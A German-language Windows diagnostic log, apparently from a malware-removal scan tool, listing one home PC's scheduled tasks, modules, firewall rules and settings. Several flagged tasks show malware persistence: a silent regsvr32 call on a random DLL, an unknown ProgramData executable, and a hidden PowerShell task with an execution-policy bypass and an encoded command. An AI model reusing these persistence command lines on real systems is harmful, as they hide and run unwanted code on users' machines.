Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
WinRAR 5.21 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
WISO steuer:Start 2016 (HKLM-x32\...\{B9654E81-E678-4A75-B477-1F83298CF149}) (Version: 23.00.1146 - Buhl Data Service GmbH)
WISO steuer:Start 2017 (HKLM-x32\...\{E3EAD09D-5F46-48BA-A3D3-7CC9822F5300}) (Version: 24.00.1375 - Buhl Data Service GmbH)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {04670283-EDCA-415F-9886-04F65EE28E14} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {0E3459D3-17FE-4CF3-9730-4DC3A34F39EC} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2017-02-02] (Bitdefender)
Task: {1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => %SystemRoot%\System32\AutoWorkplace.exe
Task: {362E13C9-3468-4E32-A32C-E7B73761F42A} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe [2014-09-28] (Samsung Electronics.)
Task: {4B617730-7F30-425D-896B-9D6B7E92F1EF} - System32\Tasks\ASUS\ASUS DIPAwayMode => C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe [2014-10-11] ()
Task: {4E847E30-5E1C-4E48-8586-201A11017D85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
Task: {57EE3E64-10C3-4731-B511-79FE0C97A37A} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {8FA48323-C067-45BF-82AC-B16DB622D2CD} - System32\Tasks\ASUS\ASUS AISuiteIII => C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe [2014-09-11] (ASUSTeK Computer Inc.)
Task: {901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} - \Optimize Start Menu Cache Files-S-1-5-21-3554052566-3312977812-1675691648-1001 -> Keine Datei <==== ACHTUNG
Task: {953B092A-5EBD-4F94-9C6E-512C12B3CF5F} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2016-03-21] (Safer-Networking Ltd.)
Task: {996A2D51-2381-4CF1-B5CC-88C9013C7FF4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-12] (Adobe Systems Incorporated)
Task: {99C86340-AB3F-46C9-9F72-4DE95AD5BB9B} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-05-09] (Microsoft Corporation)
Task: {A839842C-D8D3-410F-A730-39BC24C4484E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {A8EBBD79-429F-465A-9D7C-9D64A3AF7F70} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-04-24] (Bitdefender)
Task: {AF01F576-2A60-442D-A455-18C1D644581F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {AF7B870D-2508-4548-AF95-6776A6BBB9E1} - System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\646f2bbc\1a8cacde.dll" <==== ACHTUNG
Task: {B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
Task: {C2B4A663-9C22-4E38-8EB4-5FD10B7D021F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {C571DD8E-3ED6-476A-BAAE-A345728189FD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {CAD24F5C-D14E-4397-9E26-049636A6E220} - System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9} => C:\ProgramData\{CA67D69C-7DCC-6137-7CD8-F928B38095A6}\8979DA1C-3ED2-6DB7-EB4A-721A167AE95D.exe <==== ACHTUNG
Task: {CB7B2173-4772-4267-9E22-FAED240AC907} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-04-24] (Advanced Micro Devices, Inc.)
Task: {CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {D0B3A7DD-92A8-4BED-A5BF-74245B8AE768} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2016-03-21] (Safer-Networking Ltd.)
Task: {D0E80393-B234-4921-839B-C39706BBDD5F} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2014-06-27] (Safer-Networking Ltd.)
Task: {DE695851-C428-40A8-8661-95C82C81093C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {FEABCBF8-4763-43D1-883B-86C80CB16A79} - System32\Tasks\{0E0E0947-0F0F-7D0F-7D11-0E0F78051104} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAOwAgADsAOwA7ADsAIAA7ADsAOwA7ADsAOwA7ACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcA (Der Dateneintrag hat 9732 mehr Zeichen). <==== ACHTUNG
Task: {FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2017-04-24 17:59 - 2017-04-24 17:59 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll
2017-02-07 18:52 - 2017-02-07 18:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpbr.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpdsp.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 03243920 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpph.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 01544568 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttprbl.mdl
2012-01-17 11:24 - 2012-01-17 11:24 - 00055296 _____ () C:\Windows\SysWOW64\ASGT.exe
2017-05-07 17:13 - 2013-07-04 03:32 - 00936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
2015-04-25 07:20 - 2014-10-11 16:57 - 01271096 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
2017-03-18 22:58 - 2017-03-18 22:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00191488 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00947512 _____ () C:\Program Files (x86)\ASUS\AI Suite III\ASUSMiniBar.exe
2017-01-22 16:12 - 2013-10-29 14:43 - 00248832 _____ () C:\Program Files (x86)\Drakonia Configurator\hid.exe
2017-01-22 16:12 - 2012-12-11 12:14 - 00240640 _____ () C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
2017-05-02 20:46 - 2017-05-02 20:46 - 00023840 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\de-de\bdsystray.txtui
2017-05-03 17:02 - 2017-05-03 17:03 - 01710080 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8126.42377.0_x64__8wekyb3d8bbwe\HxMail.exe
2017-05-03 17:02 - 2017-05-03 17:03 - 13358272 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8126.42377.0_x64__8wekyb3d8bbwe\Office.UI.Xaml.Core.dll
2017-05-03 17:02 - 2017-05-03 17:03 - 01200840 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8126.42377.0_x64__8wekyb3d8bbwe\Office.UI.Xaml.Word.dll
2017-03-18 22:59 - 2017-03-20 06:43 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-03-14 00:20 - 2012-08-23 11:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2017-03-14 00:20 - 2014-05-13 13:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2017-03-14 00:20 - 2014-05-13 13:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2017-03-14 00:20 - 2014-05-13 13:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2017-03-14 00:20 - 2012-04-03 18:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2017-05-07 17:13 - 2017-05-17 21:21 - 00034448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll
2015-04-25 07:16 - 2013-09-16 12:17 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Log4cxxWrapper.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00147456 _____ () C:\Program Files (x86)\ASUS\AI Suite III\AssistFunc.dll
2015-04-25 07:20 - 2014-10-11 16:52 - 04346368 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\dip4.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\Log4cxxWrapper.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00827392 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Version\Version.dll
2015-04-25 07:20 - 2014-10-11 10:57 - 00053248 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Exeio.dll
2015-04-25 07:20 - 2014-10-11 10:57 - 00278528 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Vender.dll
2015-04-25 07:19 - 2014-09-09 04:14 - 00662016 _____ () C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMLib.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00711680 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4DIGIPowerControlAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00856576 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4EpuAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00803840 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4FanAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00807936 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4TurboVEVOAction.dll
2015-02-09 16:47 - 2015-02-09 16:47 - 01932800 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Vender.dll
2015-03-09 23:12 - 2015-03-09 23:12 - 00057344 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Exeio.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00743424 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\EPU.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00908288 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\FAN.dll
2017-01-22 16:12 - 2013-01-15 18:06 - 00061952 _____ () C:\Program Files (x86)\Drakonia Configurator\HidDevice.dll
2017-01-22 16:12 - 2011-11-22 15:18 - 00249856 _____ () C:\Program Files (x86)\Drakonia Configurator\language.dll
2015-04-25 07:27 - 2014-09-28 17:59 - 00019872 _____ () C:\Program Files (x86)\Samsung\Samsung Magician\SAMSUNG_SSD.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2013-08-22 15:25 - 2017-05-19 13:51 - 00000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Control Panel\Desktop\\Wallpaper -> D:\Dino\Bilder\Wallpaper\Bambus.png
DNS Servers: 82.163.143.157 - 82.163.142.159
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [{83AD83AC-5138-49A1-AFE6-642DD681957A}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{9F1EF34D-804D-4346-AA62-2A72FA0FBF6F}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{BDC0A943-FFD9-4C31-97CB-2F5C6223930F}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{6208BE91-3EEB-4FD5-A9F6-AAF6B8B6DAD4}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{BDBD0D1C-E183-400A-95C5-7EC28883BDC6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B0EFBE9B-6683-4F5E-B370-26BC5FBB1834}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B390EB1F-B557-4043-8E63-554A25E1FFA8}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Ghost Recon Wildlands Beta\GRW.exe
FirewallRules: [{4CE2A673-3091-4652-A0F4-EC8E65F46CDC}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's The Division PTS\TheDivision.exe
FirewallRules: [{A8417FA2-B44F-4117-8D45-30BCFD8686E6}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Sacred 3\sacred3.exe
FirewallRules: [{100496F8-41F8-47A3-85DD-5D420F581AEB}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Sacred 3\sacred3.exe
FirewallRules: [UDP Query User{2E4F3652-EFD6-4881-9213-8EA61F89A46F}D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe
FirewallRules: [TCP Query User{88C41D9B-BB60-4F64-BC68-6DAB1AF7FB31}D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe
FirewallRules: [UDP Query User{47CE1527-A9E5-4FA6-8A51-6B1E508DD7AC}D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe
FirewallRules: [TCP Query User{13A38046-9894-492B-9138-E3CF3B213870}D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe
FirewallRules: [{99E199FA-1006-4A25-8A08-E28651356CDF}] => (Allow) D:\Programme\Ubisoft\Anno 2205\Bin\Win64\Anno2205.exe
FirewallRules: [{F3A38691-4442-4EAC-B3E6-B9767F22C203}] => (Allow) D:\Programme\EA\SimCity\SimCity\SimCity.exe
FirewallRules: [{A15E195A-CCA8-4C1D-84C5-546BF8AAE637}] => (Allow) D:\Programme\EA\SimCity\SimCity\SimCity.exe
FirewallRules: [TCP Query User{A6300EE9-EEE9-43B8-B529-D238E94D113B}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{35161E84-F39F-429F-8D6F-A6CFC8EC13DF}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [{9CE73BB9-D886-4EA9-9EDD-54D04E01DB68}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{C60179E6-4096-438F-A0AE-D7E540CE18C9}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{A5BC860D-355B-4935-99F7-09C0A701AAAA}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{62A800D2-8909-45FC-BFD5-612EF096C6F1}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{24A88AFE-6316-461C-984E-4AF8F05FCC96}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{FF456D46-8990-4A73-82F7-4A5484372E42}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{CCDDE9C4-05CA-48D1-90C8-2D615BC7B643}] => (Allow) D:\Programme\Blizzard\StarCraft II\StarCraft II.exe
FirewallRules: [{607A7BED-54D2-4F98-B9A6-4F5D91E07585}] => (Allow) D:\Programme\Blizzard\StarCraft II\StarCraft II.exe
FirewallRules: [{DBABDDB1-A8F5-4509-A5A6-1A9F0EF2F69D}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\Anno5.exe
FirewallRules: [{66B9313C-1DF5-470C-B1BD-9064863CA77A}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\Anno5.exe
FirewallRules: [{38C3B3D0-D3E0-4BB2-8D00-595270146FE7}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\AutoPatcher.exe
FirewallRules: [{71C075D1-31A5-4E48-B456-75C0CC247DA6}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\AutoPatcher.exe
FirewallRules: [{859B27CC-891C-45EC-8310-BCCAAC722A85}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\InitEngine.exe
FirewallRules: [{FC73742C-58EE-43B8-B2E2-0755BDB79FAB}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\InitEngine.exe
FirewallRules: [TCP Query User{D780C36A-DADD-4902-950C-1B44C2B4591C}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{6BF43327-BDB7-4AB4-898E-8A25BE985091}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{3F0F651B-1103-4AE2-9098-9BCC4F26404D}] => (Allow) D:\Programme\Paradox Interactive\Cities Skyline\Cities.exe
FirewallRules: [{203174F0-92DD-4D57-B97E-47C4CAC797B9}] => (Allow) D:\Programme\Paradox Interactive\Cities Skyline\Cities.exe
FirewallRules: [TCP Query User{DAB2A3D3-0749-4FBF-BA46-7878A1B608DF}D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe
FirewallRules: [UDP Query User{2538DCE0-9E21-47AC-8348-A452790F29F9}D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe
FirewallRules: [{51A9B374-5A57-46AB-A962-C889763A43AD}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Besiege\Besiege.exe
FirewallRules: [{67DCCF13-0AEA-4A47-8084-823442F272BB}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Besiege\Besiege.exe
FirewallRules: [{300F8BBD-78E2-41E0-8EC4-16DF8E59E651}] => (Allow) D:\Programme\Ubisoft\Anno4.exe
FirewallRules: [{C5360BE6-1303-4A0E-8023-CC62F60B1E04}] => (Allow) D:\Programme\Ubisoft\Anno4.exe
FirewallRules: [{9274C44A-8563-4D10-AD7B-8DF46B5A8A84}] => (Allow) D:\Programme\Ubisoft\Addon.exe
FirewallRules: [{FC814241-9258-4F19-AF41-DB88E23957C1}] => (Allow) D:\Programme\Ubisoft\Addon.exe
FirewallRules: [{0B9C568A-9F54-4F5F-8A13-29E3E60DFD10}] => (Allow) D:\Programme\Ubisoft\tools\Anno4Web.exe
FirewallRules: [{0A57F8DB-B618-48DA-A350-95E445171171}] => (Allow) D:\Programme\Ubisoft\tools\Anno4Web.exe
FirewallRules: [{B609DA77-EEAE-4331-AF04-D6B0B12DD462}] => (Allow) D:\Programme\Ubisoft\tools\AddonWeb.exe
FirewallRules: [{7F026620-DD5A-46CF-A2A1-E22FB29A9F0F}] => (Allow) D:\Programme\Ubisoft\tools\AddonWeb.exe
FirewallRules: [{6207A230-EB6A-4610-B892-DF526C5DA9CB}] => (Allow) D:\Programme\Ubisoft\tools\Benchmark.exe
FirewallRules: [{6413A299-3AE2-4728-8D88-DBC7F4693304}] => (Allow) D:\Programme\Ubisoft\tools\Benchmark.exe
FirewallRules: [{8395ECDA-6B23-440A-961A-1338B31E9BCF}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Anno4.exe
FirewallRules: [{F954F9EC-FC53-42E6-8C62-5FAAB7F337F6}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Anno4.exe
FirewallRules: [{E6D4C42C-CFAE-433E-A5C8-75DD628070A2}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Addon.exe
FirewallRules: [{DA17C889-BA52-4AEA-B1F7-56B213754083}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Addon.exe
FirewallRules: [{B064A02F-82D3-46C7-BE5E-4847D6F8F3DD}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Anno4Web.exe
FirewallRules: [{46A60120-A927-4D76-888D-6D7D4D4928C8}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Anno4Web.exe
FirewallRules: [{614BDF81-34E7-4EF0-AF9D-124919FC7689}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\AddonWeb.exe
FirewallRules: [{D83D6FE6-C127-45CA-9089-CB5A015F1059}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\AddonWeb.exe
FirewallRules: [{8C525B9B-2F76-4D2A-88BF-33045C4BF9F4}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Benchmark.exe
FirewallRules: [{8170164A-B9FD-4092-A573-9EEFE3E8D466}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Benchmark.exe
FirewallRules: [TCP Query User{D3C7FE0D-703D-47B1-8FA2-AB9592BF1E7B}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{6BF3876D-F5A1-4D45-B983-F240E0C30606}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [{3495CC5B-8440-473C-99FE-BB14A3B532D1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service
==================== Wiederherstellungspunkte =========================
07-05-2017 23:26:13 Windows Update
12-05-2017 20:27:56 Windows Update
17-05-2017 21:17:54 Windows Update
19-05-2017 14:17:08 Revo Uninstaller's restore point - Freelancer
19-05-2017 14:19:32 Revo Uninstaller's restore point - Microsoft Office Professional Plus 2013
19-05-2017 14:19:39 Removed Microsoft Office Professional Plus 2013
19-05-2017 14:19:44 PROPLUS
==================== Fehlerhafte Geräte im Gerätemanager =============
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (05/19/2017 02:17:08 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert
.
Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess.
Vorgang:
Generatordaten werden gesammelt
Kontext:
Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220}
Generatorname: System Writer
Generatorinstanz-ID: {3c5a8c27-ffbd-4938-9377-2dfe4cb6a471}
Error: (05/19/2017 01:54:27 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
